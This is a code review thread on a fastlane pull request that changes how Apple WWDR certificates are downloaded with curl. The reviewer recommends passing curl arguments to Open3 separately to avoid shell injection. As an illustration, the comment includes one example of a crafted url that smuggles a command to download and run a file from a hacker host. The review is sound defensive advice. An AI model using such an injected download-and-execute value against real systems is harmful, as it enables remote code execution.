fastlane_core/lib/fastlane_core/cert_checker.rb

```diff
@@ -144,29 +144,71 @@ def self.install_missing_wwdr_certificates
       # Install all Worldwide Developer Relations Intermediate Certificates listed here: https://www.apple.com/certificateauthority/
       missing = WWDRCA_CERTIFICATES.map { |c| c[:alias] } - installed_wwdr_certificates
       missing.each do |cert_alias|
-        install_wwdr_certificate(cert_alias)
+        url = WWDRCA_CERTIFICATES.find { |c| c[:alias] == cert_alias }.fetch(:url)
+        file = Tempfile.new(File.basename(url))
+
+        unless fetch_certificate(url, file)
+          UI.verbose("Could not fetch certificate #{cert_alias}")
+          next
+        end
+
+        unless check_expiry(filename)
+         puts "#{filename} is invalid"
+         UI.verbose("Skipping installation of certificate: #{filename}") 
+         next
+        end
+
+        puts "Installing #{cert_alias}"
+        import_wwdr_certificate(filename)
       end
       missing.count
     end
 
-    def self.install_wwdr_certificate(cert_alias)
-      url = WWDRCA_CERTIFICATES.find { |c| c[:alias] == cert_alias }.fetch(:url)
-      file = Tempfile.new(File.basename(url))
-      filename = file.path
-      keychain = wwdr_keychain
-      keychain = "-k #{keychain.shellescape}" unless keychain.empty?
+    def self.fetch_certificate(url, filename)
+        # Attempts to fix an issue installing WWDR cert tends to fail on CIs
+        # https://github.com/fastlane/fastlane/issues/20960
+        curl_extras = ""
+        if FastlaneCore::Feature.enabled?('FASTLANE_WWDR_USE_HTTP1_AND_RETRIES')
+          curl_extras = "--http1.1 --retry 3 --retry-all-errors "
+        end
+
+        fetch_command = "curl #{curl_extras}-f -o #{filename} #{url}"
+        require 'open3'
+        stdout, stderr, status = Open3.capture3(fetch_command)
```

Comment:
Probably outside of the scope of this PR because the previous code already had this flaw, but while we're at it…

It's usually better practice to pass parameters for shell command calls as _separate arguments_ to `Open3.capture3` (and same goes for all `Open3` methods and even for `sh(…)`, btw), like this:

```suggestion
        curl_params = []
        if FastlaneCore::Feature.enabled?('FASTLANE_WWDR_USE_HTTP1_AND_RETRIES')
          curl_params += ['--http1.1', '--retry', '3', '--retry-all-errors']
        end
        curl_params += ['-f', '-o', filename, url]

        require 'open3'
        stdout, stderr, status = Open3.capture3('curl', curl_params)
```

This is because:
 - Passing them as a string (with parameters separated by spaces) means that this will involve shell interpretation (i.e. spawning a shell interpreter that will do the work of splitting the string into a command and its arguments, based on spaces and quotes and all) for little benefit (even if the overhead is negligible, but still)
 - That involvement of a shell interpreter means that unescaped special characters and spaces might lead to unexpected behavior (like if `filename` contains with spaces or `url` contains `$` or similar special chars) or even security concerns (parameter injection, like providing a specially crafted `url` that would be like `https://foo.bar; curl -o https://hacker.hack/malicious-file && chmod +x malicious-file && ./malicious-file`…

Granted, in this specific case it shouldn't really be a problem in practice because `filename` is unlikely to have spaces and `url` parameter comes from our constants, but just out of principle and good habits, I figured I'd mention this. Again, not a requirement to fix in this PR because this issue in the implementation was already there before anyway, but could be a good occasion.

Reply:
Right! Was looking for something like that... this is an excellent way to brush up my Ruby skills 😅
Thanks! 🙌